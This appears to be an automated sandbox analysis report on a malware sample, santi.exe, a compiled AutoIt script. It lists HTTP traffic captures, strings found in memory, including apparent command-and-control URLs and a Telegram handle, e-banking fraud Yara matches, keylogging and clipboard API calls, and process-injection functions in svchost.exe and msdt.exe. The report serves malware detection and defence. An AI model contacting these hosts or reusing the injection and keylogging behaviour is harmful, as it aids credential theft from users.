20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:35:27 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 
20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:35:29 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:35:45 GMTContent-Type: text/htmlContent-Length: 479Connection: closeETag: "651a865d-1df"Server: cdnX-Cache-Status: MISSData Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:36:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qI%2FFZtvzqyw6tju3SWm6I5iqKM99PTyN1F1rg1QMZKzrQne0S9XGAbMUVGx5GTMcakOrWtxU3fiEmaBooDGemoP5cgF95Rw4yYkTbM%2BL%2By1ClT09gWfTCMQS9CLobxBX%2BR7woSojiWw5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77b9eb5b356a57-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1688&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:36:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSkx2FhE7dBH3OWiky2Oayu7vTWLQCkaANK5jgKQtMQXwDRrYBfd62%2BDuwmeuCL%2FXmnAy5ZSB9nRVsTySOTU65dFlf8us3PXiDxtk0UO0Lxffo2rkXfS9cgK6z4Y41cU5TBMkC5FClxe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77b9fc2bb8c346-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:36:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3nEfo0nDxmkXvQ2Yvt3miIdHOcV059kkDYAPKMg9Zzdyrfd9kMOtAvrxyDbMbsw2KICV1PHK3aTB52mM%2BT8Cjs%2FBuU6slLLVPRhJGX4T5eiWs7Nk92qPjhfran3%2Ftd%2FHnOwuupv5YKn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77ba0d1f850c88-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1689&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1773&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:36:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NkmBSC1s5%2F4%2BdFkxwi5lfTkFrbdrxc%2FbcAg%2F3z3zV%2BJHrQDuJueHbVWctYsazP9vJI0CGvWcj%2FaotNYYVUuVPg52zX4WvcklN2qmTDocteTIlpxneu3%2BZcJxqgaCOLhHmL1lfMbNRHyT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77ba1d3c417c8a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1937&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=465&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 4e2<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:36:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:36:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:36:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:36:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: lavilIyGJqg.exe, 0000000C.00000002.3132349262.0000000002D75000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.espiritismo.info
                Source: lavilIyGJqg.exe, 0000000C.00000002.3132349262.0000000002D75000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.espiritismo.info/4knb/
                Source: msdt.exe, 0000000B.00000002.3133665309.000000000576C000.00000004.10000000.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.0000000003BFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.gmx.net/produkte/homepage-mail/homepage-parken/
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2ng
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033f
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: msdt.exe, 0000000B.00000003.1913301207.00000000076FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: firefox.exe, 00000010.00000002.2038827866.000000000A714000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://t.me/NVission
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: msdt.exe, 0000000B.00000002.3133665309.00000000052B6000.00000004.10000000.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.0000000003746000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCt
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00336B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00336B0C
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00336D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00336D07
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00336B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00336B0C
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00322B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00322B37

                E-Banking Fraud

                Source: Yara matchFile source: 7.2.svchost.exe.6f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1717464893.0000000005D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3132346426.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1716909243.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\santi.exeCode function: This is a third-party compiled AutoIt script.0_2_002E3D19
                Source: santi.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: santi.exe, 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_062165a9-3
                Source: santi.exe, 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: 1SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6851b28f-6
                Source: santi.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_62d61a14-1
                Source: santi.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_02407bd6-1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0071C5E3 NtClose,7_2_0071C5E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272B60 NtClose,LdrInitializeThunk,7_2_03272B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03272DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032735C0 NtCreateMutant,LdrInitializeThunk,7_2_032735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03274340 NtSetContextThread,7_2_03274340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03274650 NtSuspendThread,7_2_03274650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272BA0 NtEnumerateValueKey,7_2_03272BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272B80 NtQueryInformationFile,7_2_03272B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272BE0 NtQueryValueKey,7_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03272CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03273010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03273090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_032739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03273D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03273D70 NtOpenThread
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04784650 NtSuspendThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04784340 NtSetContextThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782C70 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782C60 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782CA0 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782D30 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782D10 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782DF0 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782DD0 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782EE0 NtQueueApcThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782E80 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782F30 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782FE0 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782FB0 NtResumeThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782AF0 NtWriteFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782AD0 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782B60 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782BF0 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782BE0 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782BA0 NtEnumerateValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_047835C0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_047839B0 NtGetContextThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782E30 NtWriteVirtualMemory
